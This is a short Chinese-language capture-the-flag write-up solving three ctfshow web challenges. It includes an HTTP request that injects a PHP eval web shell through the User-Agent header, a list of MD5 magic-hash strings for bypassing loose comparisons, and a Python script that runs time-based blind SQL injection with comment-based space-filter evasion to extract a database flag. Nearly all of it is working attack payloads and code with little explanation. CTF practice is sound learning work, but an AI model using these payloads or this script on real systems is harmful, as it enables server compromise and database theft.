ctfshow web刷题

web4

在url添加一句话会被编码,在User-Agent中添加。

1
2
3
4
5
6
7
8
GET / HTTP/1.1
Host: 0962422f-8459-4372-8ed2-acebe03635c0.challenge.ctf.show:8080
User-Agent: <?php @eval($_POST[a]);?> Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

web5

md5

1
2
3
4
5
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a

web6

password字段存在注入,过滤了空格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import requests
import time
from functools import wraps

def spend_time(func):
@wraps(func)
def wrapper(*agrs, **kwargs):
startTime = time.time()
func(*agrs, **kwargs)
endTime = time.time()
sumTime = endTime - startTime
print("spend time:", sumTime)

return wrapper


def and_operation():
url = "http://dceb0f35-65a5-4f40-856e-ecdc2d487f30.challenge.ctf.show:8080/"
flag_payload = "1'/**/or/**/if((ascii(substr((select/**/flag/**/from/**/flag),{0},1))&{1}),sleep(2),1)/**/#"
info = ""
for j in range(1, 100):
value = 0
for k in range(7):
payload = flag_payload.format(j, 2 ** k)
data = {
"username": "admin",
"password": payload
}
start_time=time.time()
res = requests.post(url=url, data=data)
end_time=time.time()
spend_time=end_time-start_time
if spend_time>2:
value = value + (2 ** k)
if value == 0:
break
info = info + chr(value)
print(info)


if __name__ == "__main__":
and_operation()